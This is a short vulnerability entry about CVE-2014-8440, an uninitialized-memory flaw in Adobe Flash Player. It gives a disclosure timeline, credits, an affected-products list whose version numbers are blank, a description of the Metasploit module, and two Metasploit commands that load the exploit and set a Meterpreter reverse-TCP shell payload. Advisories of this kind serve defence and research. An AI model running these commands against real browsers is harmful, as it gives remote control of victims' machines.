CVE-2014-8440 Adobe Flash Player UncompressViaZlibVariant Uninitialized Memory

Timeline :

Vulnerability discovered by bilou and reported to Verisign’s iDefense VCP
Vulnerability reported to the vendor by Verisign’s iDefense VCP the 2014-09-03
Patched by the vendor via APSB14-24 the 2014–11-11
Vulnerability reported integrated into exploit kits the 2014-11-20
Metasploit PoC provided the 2015–04-30

PoC provided by :

Nicolas Joly (bilou ?)
juan vazquez

Reference(s) :


Affected version(s) :

Adobe Flash Player and earlier versions
Adobe Flash Player and earlier 13.x versions
Adobe Flash Player and earlier versions for Linux
Adobe AIR desktop runtime and earlier versions
Adobe AIR SDK and earlier versions
Adobe AIR SDK & Compiler and earlier versions
Adobe AIR and earlier versions for Android

Tested on :

with Adobe Flash Player and Internet Explorer 11 on Windows 7 SP1

Description :

This module exploits an unintialized memory vulnerability in Adobe Flash Player. The vulnerability occurs in the ByteArray::UncompressViaZlibVariant method, which fails to initialize allocated memory. When using a correct memory layout this vulnerability leads to a ByteArray object corruption, which can be abused to access and corrupt memory. This module has been tested successfully on Windows 7 SP1 (32-bit), IE 8 and IE11 with Flash

Commands :

use exploit/windows/browser/adobe_flash_uncompress_zlib_uninitialized
set PAYLOAD windows/meterpreter/reverse_tcp